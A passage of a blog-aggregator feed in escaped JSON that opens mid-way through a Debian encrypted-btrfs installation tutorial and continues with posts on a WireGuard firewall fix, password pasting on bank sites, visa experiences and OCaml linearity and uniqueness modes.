option.\n\u002Fmnt # mount -o noatime,space_cache=v2,compress=zstd,ssd,discard=async,subvol=@home \u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Ftarget\u002Fhome\u002F\n\nNow mount \u002Fdev\u002Fsda1 to \u002Ftarget\u002Fboot.\n\u002Fmnt # mount \u002Fdev\u002Fsda1 \u002Ftarget\u002Fboot\u002F\n\nNow we need to add these options to the fstab file, which is located at \u002Ftarget\u002Fetc\u002Ffstab. Unfortunately, vim is not installed in this console. The only editor available is Nano.\nnano \u002Ftarget\u002Fetc\u002Ffstab\n\n\n\n\nEdit your fstab file to look similar to the one in the screenshot above. I am pasting the fstab file contents below for easy reference.\n# \u002Fetc\u002Ffstab: static file system information.\n#\n# Use 'blkid' to print the universally unique identifier for a\n# device; this may be used with UUID= as a more robust way to name devices\n# that works even if disks are added and removed. See fstab(5).\n#\n# systemd generates mount units based on this file, see systemd.mount(5).\n# Please run 'systemctl daemon-reload' after making changes here.\n#\n# \u003Cfile system> \u003Cmount point>   \u003Ctype>  \u003Coptions>       \u003Cdump>  \u003Cpass>\n\u002Fdev\u002Fmapper\u002Fsda2_crypt \u002F        btrfs   noatime,compress=zstd,ssd,discard=async,space_cache=v2,subvol=@ 0       0\n\u002Fdev\u002Fmapper\u002Fsda2_crypt \u002Fhome    btrfs   noatime,compress=zstd,ssd,discard=async,space_cache=v2,subvol=@home 0       0\n# \u002Fboot was on \u002Fdev\u002Fsda1 during installation\nUUID=12842b16-d3b3-44b4-878a-beb1e6362fbc \u002Fboot           ext4    defaults        0       2\n\u002Fdev\u002Fsr0        \u002Fmedia\u002Fcdrom0   udf,iso9660 user,noauto     0       0\n\nPlease double-check the fstab file before saving it. In Nano, you can press Ctrl+O followed by Enter to save the file. Then press Ctrl+X to quit Nano. Now, preview the fstab file by running\ncat \u002Ftarget\u002Fetc\u002Ffstab\n\nand verify that the entries are correct; otherwise, you will be booted into an unusable, broken system after the installation is complete.
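As the comment at the top of the fstab file suggests, blkid prints the UUIDs of your partitions. Here is a quick hedged check (device names are from my setup; yours may differ) to confirm that the UUID in the \u002Fboot entry matches the actual boot partition:\n# blkid \u002Fdev\u002Fsda1\n\nIf the UUID printed here does not match the one in the fstab file, fix the fstab entry before proceeding.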
Next, press Ctrl + Alt + F1 to go back to the installer.\n\n\n\nProceed to “Install the base system.”\n\n      \nScreenshot of the Debian installer installing the base system.\n\n\n\nI chose the default option here - linux-image-amd64.\nAfter this, the installer will ask you a few more questions. For the desktop environment, I chose KDE Plasma. You can choose the desktop environment as per your liking. I will not cover the rest of the installation process and assume that you were able to install from here.\nPost installation\nLet’s jump to our freshly installed Debian system. Since I created a root user, I added the user ravi to the sudoers file (\u002Fetc\u002Fsudoers) so that ravi can run commands with sudo. Follow this if you would like to do the same.\nNow we set up zram as swap. First, install zram-tools.\nsudo apt install zram-tools\n\nNow edit the file \u002Fetc\u002Fdefault\u002Fzramswap and make sure the following lines are uncommented:\nALGO=lz4\nPERCENT=50\n\nNow, run\nsudo systemctl restart zramswap\n\nIf you run lsblk now, you should see the below-mentioned entry in the output:\nzram0          253:0    0   7.8G  0 disk  [SWAP]\n\nThis shows us that zram has been activated as swap.\nNow we install Timeshift, which can be done by running\nsudo apt install timeshift\n\nAfter the installation is complete, run Timeshift and schedule snapshots as you please. We are done now. I hope the tutorial was helpful.\nSee you in the next post, and let me know if you have any suggestions or questions on this tutorial.",[],{"slug":436,"title":437,"link":438,"pubDate":439,"contentSnippet":440,"tags":441,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"beyond-self-improvement-letting-go-of-the-separate-self","Beyond Self-Improvement: Letting Go of the Separate Self","https:\u002F\u002Fwww.prashanthudupa.com\u002Fbeyond-self-improvement-letting-go-of-the-separate-self\u002F","Wed, 20 Aug 2025 14:08:29 +0000","We live in the age of self-improvement. Therapy, trauma-healing, productivity hacks, and endless self-help advice promise to make us better, happier, more fulfilled versions of ourselves. But have you ever stopped to ask: who or what is actually being improved? 
Is there really a fixed “self” at the center of all these efforts, or is […]",[148,149],{"slug":443,"title":444,"link":445,"pubDate":446,"contentSnippet":447,"tags":448,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"the-matrix-got-it-wrong","The Matrix Got It Wrong!","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthe-matrix-got-it-wrong\u002F","Fri, 08 Aug 2025 15:52:53 +0000","The 1999 blockbuster “The Matrix” unpacked so many complex philosophical ideas in a way that complete non-philosophers could comprehend and munch on them. I clearly notice a fundamental shift in my understanding of reality before and after The Matrix. When I watched it for the first time, I knew I got something, but couldn’t put […]",[148,149,224],{"slug":450,"title":451,"link":452,"pubDate":453,"contentSnippet":454,"tags":455,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-3","Understanding not just Clojure's comp function by re-implementing it","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Flessons-from-reimplementing-clojure-comp-function\u002Findex.html","Fri, 08 Aug 2025 00:00:00 +0000","Because I realised thinking like this is not obvious to Clojure newcomers, especially those having non-FP first languages. Because I was there too, all those moons ago! Feat. a salty footnote about the misdirected rancour popularly heaped upon CSS (yes, Cascading Style Sheets), triggered by the fact that 'comp' is a combinator, and I think they should have called it Combinatory Styling System.",[52,456,457,49],"functional_programming","howto",{"slug":459,"title":460,"link":461,"pubDate":462,"contentSnippet":463,"tags":464,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"vietnam-visa","Tricked by a website while applying for Vietnam visa","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fvietnam-visa\u002F","Wed, 06 Aug 2025 04:25:05 +0530","In December 2024, Badri and I went to Vietnam. In this post, I’ll document our experiences with the visa process of Vietnam. Vietnam requires an e-visa to enter the country. The official online portal for the e-visa application is evisa.xuatnhapcanh.gov.vn\u002F. However, I submitted my visa application on the website vietnamvisa.govt.vn. It was only after submitting my application and making the payment that I realized that it was not the official e-visa website. The realization came from the tagline mentioned in the top left corner of the website - the best way to obtain a Vietnam visa.\nI was a bit upset that I got tricked by that website. I should have checked the top-level domains of Vietnam’s government websites. Anyways, it is pretty easy to confuse govt.vn with gov.vn. I also paid double the amount of the official visa fee. However, I wasn’t asked to provide a flight reservation or hotel bookings - documents which are usually asked for with most visas. But they did ask me for a photo. I was not even sure whether the website was legit or not.\nBadri learnt from my experience and applied through the official Vietnam government website. During the process, he had to provide a hotel booking as well as enter the hotel address into the submission form. Additionally, the official website asked him to provide the exact points of entry to and exit from the country, which the non-official website did not ask for. 
On the other hand, he had to pay only 25 USD versus my 54 USD.\nIt turned out that the website I registered on was also legit, as they informed me a week later that my visa had been approved, along with a copy of my visa. Further, I was neither barred from entering nor found to be holding a fake visa. It appears that the main “scam” is not that the visa is fake, but rather that you will be charged more than if you apply through the official website.\nI would still recommend that you (the readers) submit your visa application only through the official website and not on any of the other such websites.\nOur visas were valid for a month (mine was valid from the 4th of December 2024 to the 4th of January 2025). We also had a nice time in Vietnam. Stay tuned for my Vietnam travel posts!\nCredits to Badri for proofreading and writing his part of the experience.",[],{"slug":466,"title":467,"link":468,"pubDate":469,"contentSnippet":470,"tags":471,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"turiya-pure-consciousness","Turiya (Pure-Consciousness)","https:\u002F\u002Fwww.prashanthudupa.com\u002Fturiya-pure-consciousness\u002F","Sun, 03 Aug 2025 09:27:49 +0000","Many spiritual traditions say that enlightenment reveals the world as an illusion and lets you see true reality. But what does that really mean? The Mandukya Upanishad describes four states of human experience: waking, dreaming, deep sleep, and a fourth called Turiya. The Four States The first three—waking, dreaming, and deep sleep—are familiar to us. […]",[149],{"slug":473,"title":474,"link":475,"pubDate":476,"contentSnippet":477,"tags":478,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"pull-back-from-the-machine","Pull back from the machine","https:\u002F\u002Fwww.prashanthudupa.com\u002Fpull-back-from-the-machine\u002F","Sat, 02 Aug 2025 06:30:48 +0000","Introduction Recently my older brother stumbled upon an AI documentation generator called DeepWiki, and shared a full documentation of my Scrite project he generated using it. DeepWiki can parse the source code of any project hosted on a public Git repository like GitHub and construct documentation explaining the architecture and implementation. Benefits of AI-Documentation Back […]",[148,149],{"slug":480,"title":481,"link":482,"pubDate":483,"contentSnippet":484,"tags":485,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"observer-observed","Observer = Observed","https:\u002F\u002Fwww.prashanthudupa.com\u002Fobserver-observed\u002F","Fri, 01 Aug 2025 07:55:41 +0000","On my morning walk in the park today, I had this very surreal knowing that my mind was I was reduced to a mere witness of this whole show. Yet, oddly, it did not feel like a reduction. It felt like the mind was dipping into “me” to construct both the world and the experiencer […]",[148,486,149],"Moments",{"slug":488,"title":489,"link":490,"pubDate":491,"contentSnippet":492,"tags":493,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"wireguard-route-fix","TIL: WireGuard's Misleading \"No Route to Host\" Error","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fwireguard-route-fix\u002F","2025-07-30T00:00:00.000Z","I recently spent some time debugging a WireGuard tunnel that was acting weird. The handshake was successful, pings worked perfectly, but any TCP connection failed with connect: no route to host.\nClassic misleading error message. 
The routing was fine.\nThe Setup#\nServer with a public IP running WireGuard (wg0) with IP 10.100.0.1\u002F24. Client connects and gets assigned 10.100.0.2\u002F32. I wanted to proxy TCP traffic from the server to a service running on the client at 10.100.0.2:7778.\nThe Investigation#\nDiagnostics showed contradictory results:\nRouting worked fine: Server routing table correctly directed 10.100.0.0\u002F24 traffic to wg0. Pings were successful:\n# On the server\n$ ping -c 3 10.100.0.2\nPING 10.100.0.2 (10.100.0.2) 56(84) bytes of data.\n64 bytes from 10.100.0.2: icmp_seq=1 ttl=64 time=150 ms\n...\nTCP failed immediately:\n# On the server\n$ curl -v http:\u002F\u002F10.100.0.2:7778\n* Trying 10.100.0.2:7778...\n* connect to 10.100.0.2 port 7778 from 10.100.0.1 port 59812 failed: No route to host\nThe key insight: ICMP was being treated differently than TCP. This pointed to a firewall issue, not routing. The “no route to host” error was the kernel interpreting an ICMP “Destination Unreachable” message from the remote peer.\nBut when I ran tcpdump on the client, things got stranger:\n# On the client\n$ sudo tcpdump -i any -n 'host 10.100.0.1'\n\n# Output when the server tries to connect\n17:36:03.043147 wg0 In  IP 10.100.0.1.14808 > 10.100.0.2.7778: Flags [S], seq 324784341, win 42780, ...\nThe TCP SYN packet arrived successfully through wg0. But no response. No SYN-ACK (success), no ICMP error (rejection). The packet was being silently dropped.\nThe Culprit: firewalld#\nThe client was running Arch Linux with firewalld. My mistake was trying to manage firewall rules with iptables commands in the WireGuard PostUp script. While iptables was installed, firewalld was the active manager, using nftables as its backend.\nWhen a new interface like wg0 comes up, firewalld needs to know which “zone” it belongs to. If unassigned, it gets handled by a restrictive default policy that silently DROPs unsolicited TCP packets while allowing ICMP (pings).\nThe Fix#\nDon’t add iptables rules. Just assign the WireGuard interface to the right firewalld zone. For internal tunnels, trusted works well.\nOn the client:\nsudo firewall-cmd --permanent --zone=trusted --add-interface=wg0\nsudo firewall-cmd --reload\nTCP connections worked instantly after this.\nTL;DR: If WireGuard pings work but TCP fails with “no route to host”, it’s probably a client firewall issue. On firewalld systems, assign the WireGuard interface to the right zone instead of messing with iptables.\nFin!",[],{"slug":495,"title":496,"link":497,"pubDate":498,"contentSnippet":499,"tags":500,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"how-to-paste-password-on-bank-site","How to paste your password on your bank's website","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhow-to-paste-password-on-bank-site\u002F","Tue, 29 Jul 2025 13:08:51 +0530","If your bank is like mine, its website doesn’t allow you to copy your password and paste it by performing a simple Ctrl+V. I tried the Don’t Fuck With Paste extension in Firefox, which could paste my bank account’s profile password but not the login password.\nTherefore, I asked on Mastodon a couple of days ago and got some responses. The solution that worked for me was to use Shift+Insert to paste the password. It worked for me in LibreWolf and Firefox, and that’s all I needed.\nFurthermore, this behavior by bank websites leads to users choosing insecure and memorable passwords. 
Using this trick will help you choose strong passwords for your bank account.\nI prefer to use random and strong passwords generated using the password manager pass. It is a freedom-respecting software, unlike popular proprietary password managers promoted by YouTubers. Feel free to check out their webpage here. The reason I use pass is that it stores all the passwords locally (and optionally in a remote Git repository) in encrypted form, which can only be decrypted using your private GPG keys.",[],{"slug":502,"title":503,"link":504,"pubDate":505,"contentSnippet":506,"tags":507,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"morality-choice-free-will-and-responsibility","Morality, Choice, Free-Will, and Responsibility","https:\u002F\u002Fwww.prashanthudupa.com\u002Fmorality-choice-free-will-and-responsibility\u002F","Fri, 25 Jul 2025 06:29:16 +0000","In our everyday experience, we often think of ourselves as a separate “Self”-a permanent entity that is distinct from everything else in the world, including other people and things. This sense of separation can lead to anxiety, fear, and other forms of suffering. Non-duality offers a radical shift in perspective. Instead of seeing ourselves as […]",[148,149],{"slug":509,"title":510,"link":511,"pubDate":512,"contentSnippet":513,"tags":514,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"on-memory","On Memory","https:\u002F\u002Fwww.prashanthudupa.com\u002Fon-memory\u002F","Sun, 20 Jul 2025 08:18:16 +0000","Memory is whatever the mind brings up. Hypothetically, the mind can create random images, thoughts, and bodily sensations that feel like memories. Even when the body-mind system is working perfectly, memory is always at the mercy of whatever it pulls up in the moment. It’s possible that the body-mind system isn’t buggy and it never […]",[148,149],{"slug":516,"title":517,"link":518,"pubDate":519,"contentSnippet":520,"tags":521,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"maya","māyā – ಮಾಯಾ – माया","https:\u002F\u002Fwww.prashanthudupa.com\u002Fmaya\u002F","Tue, 15 Jul 2025 17:06:50 +0000","The term māyā is often translated as “illusion”—a powerful force that makes the dualistic world appear real, even though only the non-dual Brahman truly exists. However, I prefer to interpret māyā not as “illusion” but as “disappearance” or “vanishing” (in its street-Kannada sense). In truth, all of reality is constantly vanishing into a void. This […]",[148,149],{"slug":523,"title":524,"link":525,"pubDate":526,"contentSnippet":527,"tags":528,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-4","Poor man's bitemporal data system in SQLite and Clojure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fpoor-mans-time-oriented-data-system\u002Findex.html","Mon, 14 Jul 2025 00:00:00 +0000","On trying to mash up SQLite with ideas stolen from Accountants, Clojure, Datomic, XTDB, Rama, and Local-first-ers, to satisfy Henderson's Tenth Law. Viz., to make a sufficiently complicated data system containing an ad-hoc, informally-specified, bug-ridden, slow implementation of half of a bitemporal database. Because? 
Because laying about on a hammock, contemplating hopelessly complected objects like Current Databases isn't just for the Rich man.",[456,52,529,530,531,532,227,533],"databases","architecture","software_design","local_first","web_development",{"slug":535,"title":536,"link":537,"pubDate":538,"contentSnippet":539,"tags":540,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"there-is-no-doer","Awareness is always after the fact","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthere-is-no-doer\u002F","Tue, 08 Jul 2025 05:06:22 +0000","Awareness is always of what has already happened. I become aware of what I see only after the seeing has occurred. I become aware of what I hear only after the hearing has happened. I become aware of what I touch only after the touch has occurred. I become aware of what I taste only after the tasting […]",[148,149],{"slug":542,"title":543,"link":544,"pubDate":545,"contentSnippet":546,"tags":547,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-5","Riff: LLMs are Software Diamonds","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fllms-are-diamonds\u002Findex.html","Tue, 01 Jul 2025 00:00:00 +0000","The making of a diamond is a repeatable, but naturally non-reproducible process. The exact same input of carbon subject to the exact same configuration of pressure, temperature, forge, time, process control will never produce the exact same diamond twice. Once made, a diamond is unique. And once made, a diamond is forever.",[55,49,244,245,246],{"slug":549,"title":550,"link":551,"pubDate":552,"contentSnippet":553,"tags":554,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"brunei-visa","Getting Brunei visa","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fbrunei-visa\u002F","Sat, 21 Jun 2025 13:30:51 +0530","In December 2024, my friend Badri and I were planning a trip to Southeast Asia. At this point, we were planning to visit Singapore, Malaysia and Vietnam. My Singapore visa had already been approved, and Malaysia was visa-free for us. For Vietnam, we had to apply for an e-visa online.\nWe considered adding Brunei to our itinerary. I saw some videos of the Brunei visa process and got the impression that we needed to go to the Brunei embassy in Kuching, Malaysia in person.\nHowever, when I happened to search for Brunei on Organic Maps¹, I stumbled upon the Brunei Embassy in Delhi. It seemed to be somewhere in Hauz Khas. As I was going to Delhi to collect my Singapore visa the next day, I figured I’d also visit the Brunei Embassy to get information about the visa process.\nThe next day I went to the location displayed by Organic Maps. It was next to the embassy of Madagascar, and a sign on the road divider confirmed that I was at the right place.\nThat said, it actually looked like someone’s apartment. I entered and asked for directions to the Brunei embassy, but the people inside did not seem to understand my query. After some back and forth, I realized that the embassy wasn’t there.\nI now searched for the Brunei embassy on the Internet, and this time I got an address in Vasant Vihar. It seemed like the embassy had been moved from Hauz Khas to Vasant Vihar. Going by the timings mentioned on the web page, the embassy was closing in an hour.\nI took a Metro from Hauz Khas to Vasant Vihar. After deboarding at the Vasant Vihar metro station, I took an auto to reach the embassy. The address listed on the webpage got me into the correct block. 
However, the embassy was still nowhere to be seen. I asked around, but security guards in that area pointed me to the Burundi embassy instead.\nAfter some more looking around, I did end up finding the embassy. I spoke to the security guards at the gate and told them that I would like to know the visa process. They dialled a number and asked the person on the line to explain the visa process to me.\nI spoke to a lady on the phone. She listed the documents required for the visa process and mentioned that the timings for visa applications were from 9 o’clock to 11 o’clock in the morning. She also informed me that the visa fee was ₹1000.\nI also asked about the process for Badri, who lives far away in Tamil Nadu and could not report to the embassy physically. She told me that I could submit a visa application on his behalf, along with an authorization letter.\nHaving found the embassy in Delhi was a huge relief. The other plan - going to Kuching, Malaysia - was a bit uncertain, and we didn’t know how much time it would take. Getting our passports submitted at an embassy in a foreign country was also not ideal.\nA few days later, Badri sent me all the documents required for his visa. I went to the embassy and submitted both the applications. The lady who collected our visa submissions asked me for our flight reservations from Delhi to Brunei, whereas ours were (keeping with our itinerary) from Kuala Lumpur. She said that she might contact me later if it was required.\nFor reference, here is the list of documents we submitted -\nVisa application form\nPassport\nA photocopy of the passport\nAuthorization letter from Badri (authorizing me to submit his application on his behalf)\nAirline ticket itinerary\nHotel bookings\nCover letter\n2 photos\nProof of employment\n6 months’ bank statement (they specifically asked for ₹1,00,000 or more in bank balance)\nI then asked about the procedure to collect the passports and visa results. Usually, embassies will tell you that they will contact you when they have decided on your applications. However, here I was informed that if they don’t contact me within 5 days, I can come and collect our passports and visa results between 13:30-14:30 hours on the fifth day. That was strange :)\nI did visit the embassy to collect our visa results on the fifth day. However, the lady scolded me for not bringing the receipt she had given me. I was afraid that I might have to go all the way back home and bring the receipt to get our passports. The travel date was close, and it would take some time for Badri to receive his passport via courier as well.\nFortunately, she gave me our passports (with the visas attached) and asked me to share a scanned copy of the receipt via email after I got home.\nWe were elated that our visas were approved. Now we could focus on booking our flights.\nIf you are going to Brunei, remember to fill in their arrival card on their website within 48 hours of your arrival!\nThanks to Badri and Contrapunctus for reviewing the draft before publishing the article.\nNowadays, I prefer using Comaps instead of Organic Maps and recommend you do the same. Organic Maps had some issues with its governance, and the community’s concerns weren’t being addressed. 
↩︎",[],{"slug":556,"title":557,"link":558,"pubDate":559,"contentSnippet":560,"tags":561,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"xocaml","Testing x-ocaml, OCaml notebooks as a WebComponent","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fx-ocaml\u002Fblogging\u002F2025\u002F06\u002F20\u002Fxocaml\u002F","2025-06-20T10:00:00.000Z","Can we have OCaml notebooks as pure client-side code? Can these notebooks have\nrich editor support (highlighting, formatting, types on hover, autocompletion,\ninline diagnostics, etc.)? Can you take packages from OPAM and use them in these\nnotebooks?\nThe answer to all of these turns out to be a resounding yes, thanks to\nx-ocaml. This post is my experiment playing\nwith x-ocaml and integrating it into this blog.\nThe most wonderful thing about programming is that it lets you experiment\nfreely. You can try out an idea, get instant feedback, and learn by doing—much\nlike playing with Lego bricks or sketching on a canvas. The two main courses\nthat I teach at IITM, CS3100 and\nCS6225, both involve me\nlive-coding during every lecture. However, blogging about OCaml where the code\nis static and non-interactive always felt a bit unsatisfying.\nEnter x-ocaml, which allows for a way to\nembed OCaml notebooks into any webpage thanks to WebComponents. All you need to\ndo is load some JavaScript in your webpage and you can start embedding code\ncells using the \u003Cx-ocaml> tag. The snippet below:\n\n\u003Cx-ocaml>\nprint_endline \"Hello, world\"\n\u003C\u002Fx-ocaml>\n\n\nrenders to:\nThe code is interpreted in the browser thanks to the OCaml interpreter compiled\nto JavaScript through the\nJs_of_ocaml compiler.\nThere is also support for Merlin and\nOCamlformat in the code editor. Try\nhovering over the functions and writing some code. You should see inferred types\nand auto-completion suggestions. It turns out that this solution integrates well\nwith Jekyll, which is what I use for this blog.\nReverse-mode AD using Effects\nJs_of_ocaml also supports effect\nhandlers. Here’s an\nimplementation of reverse-mode algorithmic\ndifferentiation\nusing effect handlers, running in the browser.\nHere are some tests.\nUsing other libraries\nx-ocaml also supports loading any js_of_ocaml compatible library into the\nwebpage. Let’s use digestif.\nFor any library that you want to export, install the library using opam.\nx-ocaml provides a command-line utility to export the library.\n\n$ x-ocaml --effects digestif.ocaml -o digestif.js\n\n\nThis produces the JavaScript artifact that can be used in the webpage. It may be\ninstructive to look at the\nsource\nof this post to see how the compiler and the libraries are integrated into this\nblog post. There is a little script at the top of the file:\n\n\n\u003Cscript async\n  src=\"{{ '\u002Fassets\u002Fx-ocaml.js' | absolute_url }}\"\n  src-worker=\"{{ '\u002Fassets\u002Fx-ocaml.worker+effects.js' | absolute_url }}\"\n  src-load=\"{{ '\u002Fassets\u002Fdigestif.js' | absolute_url }}\"\n>\u003C\u002Fscript>\n\n\n\nWhat next?\nThere are a number of rough edges to x-ocaml. This is expected since this\nproject appears to be one of Arthur’s hacking\nexpeditions (which, as usual, is pushing the state of the art forward).\nIt would be fun to use this for teaching\nCS3100 and also\nother\nOCaml\ntutorials.\nPerhaps even have an interactive version of the Real World OCaml\nbook.\nNot all OCaml libraries can be compiled to JavaScript. 
The common reason is\nthat they may depend on features not available in JavaScript. In writing this\npost, I unsuccessfully tried for a long time to get\nmirage-crypto working.\nmirage-crypto has a large C\ndependency, which\ndoes not work with Js_of_ocaml. Js_of_ocaml promises to take any opam library\ninstalled on your opam switch and compile it to JavaScript. However, at that\npoint, we’re really cross-compiling the opam packages installed on your switch to\nJavaScript, since the installed package may make some assumptions about the\nplatform that it is supposed to run on. Hence, JavaScript compilation of\narbitrary OCaml packages is unlikely to work in the general case. Unfortunately,\nthe error was difficult to debug since the failure was at runtime, and was not\napparent in the error messages (at least for me, who has little JavaScript\nexperience). It would be nice to have the opam packages explicitly say whether\nthey are JavaScript compatible, and to have build tooling that reports errors like\nthese early.",[],{"slug":563,"title":564,"link":565,"pubDate":566,"contentSnippet":567,"tags":568,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"linearity-and-uniqueness","Linearity and uniqueness","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmodes\u002Foxcaml\u002F2025\u002F06\u002F04\u002Flinearity_and_uniqueness\u002F","2025-06-04T10:00:00.000Z","In the last post,\nwe looked at the uniqueness mode and how uniqueness may be used to optimise. As we\nwill see, uniqueness alone is insufficient in practice, and we also need a\nconcept of linearity for uniqueness to be useful.\nCapturing unique values\nLet’s start with an example. Recall the signature of the unique reference\nmodule.\n\nmodule type Unique_ref = sig\n  type 'a t\n  val alloc : 'a -> 'a t @ unique\n  val free : 'a t @ unique -> unit\n  val get : 'a t @ unique -> 'a Modes.Aliased.t * 'a t @ unique\n  val set : 'a t @ unique -> 'a -> 'a t @ unique\nend\n\n\nAssume that we also have an implementation of the module:\n\nmodule Unique_ref : Unique_ref\n\n\nConsider the following example, which works fine:\n\nlet works () =\n  let t = alloc 42 in (* Allocate a unique reference *)\n  free t (* free it *)\n\n\nNow consider this modified example:\n\nlet wat () =\n  let t = alloc 42 in (* Allocate a unique reference *)\n  let f () = free t in (* capture free in a closure *)\n  f (); (* free it *)\n  f () (* free it again??? *)\n\n\nObserve that f has captured t in the closure, and when called frees t. It\nshould be clear that calling f more than once is bad – it leads to a\ndouble-free issue! What property do we want of f? Uniqueness is insufficient;\nwe have a unique reference to f in this program, with which we call f twice.\nWhat we want to enforce is that f can be called at most once. The compiler\nhas a linearity mode which captures the idea of how many times a value can be\nused. We have two modes in the linearity axis – once, which stands for\n“at most once” and many (the default one for all values), which allows values\nto be used an arbitrary number of times.\nWhenever a unique value is captured by a closure, the closure gets the once\nmode, which allows the closure to be called at most once. This program rightly\ngets rejected by the compiler.\n\nFile \".\u002Funique_ref.ml\", line 32, characters 2-3:\n32 |   f () (* free it again??? 
*)\n       ^\nError: This value is used here,\n       but it is defined as once and has already been used:\nFile \".\u002Funique_ref.ml\", line 31, characters 2-3:\n31 |   f (); (* free it *)\n       ^\n\n\nA linear ref\nNow, one might wonder whether the unique reference that we’ve implemented may\ninstead be implemented with the linear mode. The answer is yes.\n\nmodule type Linear_ref = sig\n  type 'a t\n  val alloc : 'a -> 'a t @ once\n  val free : 'a t @ once -> unit\n  val get : 'a t @ once -> 'a * 'a t @ once\n  val set : 'a t @ once -> 'a -> 'a t @ once\nend\n\nmodule Linear_ref : Linear_ref = struct\n  type 'a t = { mutable value : 'a }\n  let alloc x = { value = x }\n  let free t = ()\n  let get t =\n    t.value, t\n  let set t x =\n    t.value \u003C- x;\n    t\nend\n\n\nThis works as expected:\n\nopen Linear_ref\n\nlet works () =\n  let r = alloc 42 in\n  let v,r = get r in\n  let r = set r (v + 1) in\n  let v,r = get r in\n  print_int v;\n  free r;\n  ()\n\nlet fails () =\n  let r = alloc 42 in\n  free r;\n  get r (* fails here *)\n\n\nwith the error message:\n\nFile \".\u002Flinear_ref.ml\", line 34, characters 6-7:\n34 |   get r (* fails here *)\n           ^\nError: This value is used here,\n       but it is defined as once and has already been used:\nFile \".\u002Flinear_ref.ml\", line 33, characters 7-8:\n33 |   free r;\n\n\nWhy both linearity and uniqueness?\nGiven this example, you might be wondering: if the safe reference may be\nimplemented equivalently using both uniqueness and linearity, why do we need\nboth? Obviously, there’s something interesting going on where unique values\ncaptured in a closure need linearity. Does that mean linearity is sufficient?\nIt turns out that only recently was the relationship between the two formally\nstudied in the same type system. While linear types and uniqueness types have a\nlong history of being studied independently, Marshall et al. in their paper,\n“Linearity and Uniqueness: An Entente\nCordiale”, present the ideas in\nthe same type system. They provide some key insights.\nThe first insight is that\nin a setting where all values must be linear, we can also guarantee that every value is unique, and vice versa! Intuitively, if it is never possible to duplicate a value, then it will never be possible for said value to have multiple references.\nIn our Unique_ref and Linear_ref, every operation that operates on the ref\nrequires uniqueness or linearity, respectively. Hence, they seem almost\nequivalent in expressive power.\nIt is when we also have the ability for unrestricted use (non-linear\u002Fnon-unique) that differences between linearity and uniqueness begin to arise, as we will soon see.\nIn our language, we do have the ability for unrestricted use. That is, in the\nlinearity axis, many is the default mode attributed to all the values not\ntagged or inferred as once. Similarly, aliased is the default mode\nattributed to all the values not tagged or inferred as unique.\nThe type system has submoding: values may move freely to greater modes\n(which typically restrict what can be done with those values) but not to\nlesser modes. 
For example, a many value may be safely used in a context where\na once value is expected.\n\nlet works () =\n  let set_to_20 (r @ once) =\n    r := 20\n  in\n  let r @ many = ref 10 in\n  set_to_20 r (* [r @ many] is passed to a function that expects [int ref @ once] *)\n\n\nSimilarly, you can use a unique value in a context where an aliased value is\nexpected.\n\nlet dup r = r,r\n\nlet works () =\n  let r = Unique_ref.alloc 42 in\n  let a,b = dup r in\n  a,b\n\n\nThe type of the works function is val works : unit -> int Unique_ref.t * int\nUnique_ref.t, which crucially lacks the fact that the references are at the unique\nmode. We can’t call any functions from the Unique_ref module with these\nreferences, all of which expect a reference with the unique mode.\nUniqueness is more appropriate for safe refs\nIn our running example of implementing a safe ref, it turns out that uniqueness\nis more appropriate. Consider the type signature of free in Unique_ref:\n\nval free : 'a t @ unique -> unit\n\n\nThe type signature says that there are no other aliases to this reference.\nHence, its memory may be safely deallocated. However, consider the\nLinear_ref.free signature:\n\nval free : 'a t @ once -> unit\n\n\nThe signature says that this reference must be used at most once. In particular,\njust by looking at the signature, we cannot conclude that there are no other\naliases to this reference. But we know that the API is safe, since the only way\nto create a safe reference is through the alloc function, which returns a\nonce-usable reference, and every other operation also expects and returns a\nonce-usable reference.\nThe correctness of the linear version depends on reasoning over the whole\nAPI, whereas the unique version can be concluded to be safe just by\nlooking at the signature of the free function. This modular reasoning makes\nuniqueness more appropriate for our safe reference API.\nThe past and the future\nIn a sense, uniqueness and linearity are duals of each other. Uniqueness talks\nabout the past – whether a value may have been aliased in the past. It is okay to\nalias a unique value in the future and lose the uniqueness mode. Linearity talks\nabout the future – whether a value may be used more than once in the future.\nYou can take any value and ascribe the linear mode to it, restricting its use in\nthe future. However, there may be other aliases to this value from the past.\nConclusions\nThe code examples are available\nhere.\nSection 2.1 of Marshall et al.’s\npaper is quite readable and\nexplains the distinction between linearity and uniqueness with some historical\ncontext. I highly recommend it.\nAcknowledgements\nThanks to Richard Eisenberg 